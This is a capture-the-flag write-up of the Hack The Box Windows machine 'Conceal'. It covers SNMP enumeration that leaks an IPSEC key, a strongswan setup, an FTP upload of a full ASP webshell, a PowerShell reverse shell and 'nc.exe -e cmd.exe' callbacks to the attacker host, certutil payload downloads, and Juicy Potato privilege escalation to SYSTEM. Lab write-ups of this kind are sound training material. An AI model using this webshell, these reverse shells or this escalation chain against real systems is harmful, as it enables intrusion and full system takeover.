Hack The Box - Conceal

Quick Summary

Hey guys today Conceal retired and here’s my write-up about it. Conceal was a straightforward fun box, The only tricky part about it is gaining IPSEC connection to gain access to some filtered services. That first part involved some guessing but after that everything is simple and very straightforward. I liked this machine and it was a very fun one. It’s a windows machine and its ip is 10.10.10.116, I added it to /etc/hosts as conceal.htb. Let’s jump right in.

Nmap

As always we will start with nmap to scan for open ports and services.
nmap -sV -sT -sC conceal.htb

And we got nothing !
I ran another nmap UDP scan on all ports :
nmap -vvv -sU -o nmapudp conceal.htb --max-retries 0
The output was too long so I will show the only important part :


It was not sure about port 161, but it showed that port 500 is open.
I ran a third scan on ports 500 and 161 :
nmap -p 161,500 -sV -sU -sC conceal.htb

Full Output :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
# Nmap 7.70 scan initiated Fri May 17 16:37:52 2019 as: nmap -p 161,500 -sV -sU -sC -o nmapudp2 conceal.htb
Nmap scan report for conceal.htb (10.10.10.116)
Host is up (0.20s latency).

PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server (public)
| snmp-interfaces:
| Software Loopback Interface 1\x00
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 1 Gbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel(R) 82574L Gigabit Network Connection\x00
| IP address: 10.10.10.116 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:55:a7 (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
| Traffic stats: 399.03 Kb sent, 6.41 Mb received
| Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000\x00
| MAC address: 00:50:56:b9:55:a7 (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
| Traffic stats: 399.03 Kb sent, 6.41 Mb received
| Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000\x00
| MAC address: 00:50:56:b9:55:a7 (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
| Traffic stats: 399.03 Kb sent, 6.41 Mb received
| Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000\x00
| MAC address: 00:50:56:b9:55:a7 (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 399.03 Kb sent, 6.41 Mb received
| snmp-netstat:
| TCP 0.0.0.0:21 0.0.0.0:0
| TCP 0.0.0.0:80 0.0.0.0:0
| TCP 0.0.0.0:135 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 0.0.0.0:49664 0.0.0.0:0
| TCP 0.0.0.0:49665 0.0.0.0:0
| TCP 0.0.0.0:49666 0.0.0.0:0
| TCP 0.0.0.0:49667 0.0.0.0:0
| TCP 0.0.0.0:49668 0.0.0.0:0
| TCP 0.0.0.0:49669 0.0.0.0:0
| TCP 0.0.0.0:49670 0.0.0.0:0
| TCP 10.10.10.116:139 0.0.0.0:0
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:500 *:*
| UDP 0.0.0.0:4500 *:*
| UDP 0.0.0.0:5050 *:*
| UDP 0.0.0.0:5353 *:*
| UDP 0.0.0.0:5355 *:*
| UDP 10.10.10.116:137 *:*
| UDP 10.10.10.116:138 *:*
| UDP 10.10.10.116:1900 *:*
| UDP 10.10.10.116:65496 *:*
| UDP 127.0.0.1:1900 *:*
|_ UDP 127.0.0.1:65497 *:*
| snmp-processes:
| 1:
| Name: System Idle Process
| 4:
| Name: System
| 308:
| Name: smss.exe
| 348:
| Name: svchost.exe
| Path: C:\Windows\System32\
| Params: -k LocalSystemNetworkRestricted
| 392:
| Name: csrss.exe
| 468:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k LocalService
| 472:
| Name: wininit.exe
| 484:
| Name: csrss.exe
| 564:
| Name: winlogon.exe
| 584:
| Name: services.exe
| 616:
| Name: lsass.exe
| Path: C:\Windows\system32\
| 696:
| Name: fontdrvhost.exe
| 704:
| Name: fontdrvhost.exe
| 712:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k DcomLaunch
| 812:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k RPCSS
| 900:
| Name: svchost.exe
| Path: C:\Windows\System32\
| Params: -k NetworkService
| 908:
| Name: dwm.exe
| 940:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k netsvcs
| 976:
| Name: svchost.exe
| Path: C:\Windows\System32\
| Params: -k LocalServiceNetworkRestricted
| 984:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k LocalServiceNoNetwork
| 1140:
| Name: vmacthlp.exe
| Path: C:\Program Files\VMware\VMware Tools\
| 1232:
| Name: svchost.exe
| Path: C:\Windows\System32\
| Params: -k LocalServiceNetworkRestricted
| 1248:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k LocalSystemNetworkRestricted
| 1292:
| Name: LogonUI.exe
| Params: /flags:0x0 /state0:0xa3a2c855 /state1:0x41c64e6d
| 1392:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k LocalServiceNetworkRestricted
| 1400:
| Name: svchost.exe
| Path: C:\Windows\System32\
| Params: -k LocalServiceNetworkRestricted
| 1492:
| Name: spoolsv.exe
| Path: C:\Windows\System32\
| 1728:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k apphost
| 1748:
| Name: svchost.exe
| Path: C:\Windows\System32\
| Params: -k utcsvc
| 1788:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k ftpsvc
| 1856:
| Name: SecurityHealthService.exe
| 1868:
| Name: snmp.exe
| Path: C:\Windows\System32\
| 1892:
| Name: VGAuthService.exe
| Path: C:\Program Files\VMware\VMware Tools\VMware VGAuth\
| 1912:
| Name: vmtoolsd.exe
| Path: C:\Program Files\VMware\VMware Tools\
| 1932:
| Name: ManagementAgentHost.exe
| Path: C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\
| 1956:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k iissvcs
| 1980:
| Name: MsMpEng.exe
| 2068:
| Name: Memory Compression
| 2204:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k LocalServiceAndNoImpersonation
| 2444:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k NetworkServiceNetworkRestricted
| 2952:
| Name: WmiPrvSE.exe
| Path: C:\Windows\system32\wbem\
| 2976:
| Name: NisSrv.exe
| 3052:
| Name: dllhost.exe
| Path: C:\Windows\system32\
| Params: /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
| 3132:
| Name: SearchIndexer.exe
| Path: C:\Windows\system32\
| Params: /Embedding
| 3280:
| Name: svchost.exe
| Path: C:\Windows\system32\
| Params: -k appmodel
| 3376:
| Name: msdtc.exe
| Path: C:\Windows\System32\
| 3948:
| Name: svchost.exe
| 5004:
| Name: SearchFilterHost.exe
| Path: C:\Windows\system32\
| Params: 0 700 704 712 8192 708
| 5032:
| Name: SearchProtocolHost.exe
| Path: C:\Windows\system32\
|_ Params: Global\UsGthrFltPipeMssGthrPipe23_ Global\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 "Software\Microsoft\Windows Search" "Moz
| snmp-sysdescr: Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
|_ System uptime: 2h08m26.61s (770661 timeticks)
| snmp-win32-services:
| Application Host Helper Service
| Background Intelligent Transfer Service
| Background Tasks Infrastructure Service
| Base Filtering Engine
| CNG Key Isolation
| COM+ Event System
| COM+ System Application
| Client License Service (ClipSVC)
| Connected Devices Platform Service
| Connected User Experiences and Telemetry
| CoreMessaging
| Cryptographic Services
| DCOM Server Process Launcher
| DHCP Client
| DNS Client
| Data Sharing Service
| Data Usage
| Device Setup Manager
| Diagnostic Policy Service
| Diagnostic Service Host
| Distributed Link Tracking Client
| Distributed Transaction Coordinator
| Geolocation Service
| Group Policy Client
| IKE and AuthIP IPsec Keying Modules
| IP Helper
| IPsec Policy Agent
| Local Session Manager
| Microsoft Account Sign-in Assistant
| Microsoft FTP Service
| Network Connection Broker
| Network List Service
| Network Location Awareness
| Network Store Interface Service
| Plug and Play
| Power
| Print Spooler
| Program Compatibility Assistant Service
| RPC Endpoint Mapper
| Remote Procedure Call (RPC)
| SNMP Service
| SSDP Discovery
| Security Accounts Manager
| Security Center
| Server
| Shell Hardware Detection
| State Repository Service
| Storage Service
| Superfetch
| System Event Notification Service
| System Events Broker
| TCP/IP NetBIOS Helper
| Task Scheduler
| Themes
| Tile Data model server
| Time Broker
| TokenBroker
| User Manager
| User Profile Service
| VMware Alias Manager and Ticket Service
| VMware CAF Management Agent Service
| VMware Physical Disk Helper Service
| VMware Tools
| WinHTTP Web Proxy Auto-Discovery Service
| Windows Audio
| Windows Audio Endpoint Builder
| Windows Connection Manager
| Windows Defender Antivirus Network Inspection Service
| Windows Defender Antivirus Service
| Windows Defender Security Centre Service
| Windows Driver Foundation - User-mode Driver Framework
| Windows Event Log
| Windows Firewall
| Windows Font Cache Service
| Windows Management Instrumentation
| Windows Process Activation Service
| Windows Push Notifications System Service
| Windows Search
| Windows Time
| Workstation
|_ World Wide Web Publishing Service
| snmp-win32-software:
| Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161; 2018-10-12T20:10:30
| Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161; 2018-10-12T20:10:22
|_ VMware Tools; 2018-10-12T20:11:02
| snmp-win32-users:
| Administrator
| DefaultAccount
| Destitute
|_ Guest
500/udp open isakmp Microsoft Windows 8
| ike-version:
| vendor_id: Microsoft Windows 8
| attributes:
| MS NT5 ISAKMPOAKLEY
| RFC 3947 NAT-T
| draft-ietf-ipsec-nat-t-ike-02\n
| IKE FRAGMENTATION
| MS-Negotiation Discovery Capable
|_ IKE CGA version 1
Service Info: Host: Conceal; OS: Windows 8; CPE: cpe:/o:microsoft:windows:8, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 17 16:42:05 2019 -- 1 IP address (1 host up) scanned in 253.58 seconds

We have two services to enumerate. isakmp which is IPSEC and snmp.

Snmp Enumeration

I started with snmpwalk :
snmpwalk -c public -v 1 conceal.htb
The output was very long but we only need this first part :

We have a password hash for the IPSEC connection : 9C8B1A372B1878851BE2C097031B6E43
I used crackstation to crack it and I got this result :

Great ! Now we need to enumerate the ike vpn service to know how to connect to it.

ike-scan, Setting up The Connection

I ran ike-scan and got these results :

I installed strongswan to set up the IPSEC connection. With the help of the info I got from ike-scan and some guessing I could come up with this configuration which worked :
/etc/ipsec.conf :

1
2
3
4
5
6
7
8
9
10
conn rick-to-conceal
authby=secret
auto=route
keyexchange=ikev1
ike=3des-sha1-modp1024
left=10.10.xx.xx
right=10.10.10.116
type=transport
esp=3des-sha1
rightprotoport=tcp

/etc/ipsec.secrets :

1
10.10.xx.xx 10.10.10.116 : PSK "Dudecake1!"

I started ipsec then I initialized the connection :
ipsec start
ipsec up rick-to-conceal

It worked fine, now we are connected to a vpn network let’s see what new services can we get.

Nmap (Second Time)

nmap -sV -sT -sC conceal.htb

We got ftp on port 21 , http on port 80 and smb on port 445. I wanted to check ftp first and see if I can authenticate anonymously.

FTP, File Upload, Reverse Shell and User Flag


It worked but there was literally nothing on that ftp server. I uploaded a test file to check if I have write permissions on that ftp server and I had.

I Checked the http service and there was only the default IIS page :

I ran gobuster with /usr/share/wordlists/dirb/common.txt and got only one directory called /upload :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
gobuster -u http://conceal.htb/ -w /usr/share/wordlists/dirb/common.txt

=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://conceal.htb/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/17 17:18:57 Starting gobuster
=====================================================
/upload (Status: 301)
=====================================================
2019/05/17 17:28:23 Finished
=====================================================

I went to /upload and found my test file :

Great ! I uploaded an asp shell to get remote code execution :

shell.asp :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
<!--
ASP Webshell
Working on latest IIS
Referance :-
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script
http://www.w3schools.com/asp/
-->


<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>

</BODY>
</HTML>



I got a powershell reverse shell :

Payload :

1
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.xx.xx',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


We got user.

SeImpersonatePrivilege, Juicy Potato, Privilege Escalation and Root Flag

After getting user the privilege escalation is easy and straightforward. Before doing any enumeration I checked my privileges as Destitute and I found that I had the SeImpersonatePrivilege.

This means that we can apply the famous attack Juicy Potato. You can read about it on the official github repository. We need to know the version of this windows to pick the right clsid.
systeminfo

It’s Microsoft Windows 10 Enterprise. I got the clsid of wuauserv from here which is :
{e60687f7-01a1-40aa-86ac-db1cbf673334}
I got a compiled binary of Juicy Potato from the github repository. I hosted it on a python simple http server then I downloaded it on the machine with certutil :

1
certutil -urlcache -split -f http://10.10.xx.xx/juicypotato.exe juicypotato.exe


However I had some problems with my powershell reverse shell and it couldn’t run juicypotato.exe properly so I got another cmd shell with nc :

1
certutil -urlcache -split -f http://10.10.xx.xx/nc.exe nc.exe

nc.exe -e cmd.exe 10.10.xx.xx 1339


I created a bat file that executes : nc.exe -e cmd.exe 10.10.xx.xx 1340 to get me a reverse shell :

1
echo C:\users\Destitute\appdata\local\temp\nc.exe -e cmd.exe 10.10.xx.xx 1340 > rev.bat

Then I ran juicypotato.exe and made it execute that bat file :

1
juicypotato.exe -p C:\users\Destitute\appdata\local\temp\rev.bat -l 1340 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}


It worked fine and we got a reverse shell as nt authority\system


And we owned root !

That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Lightweight
Next Hack The Box write-up : Hack The Box - Chaos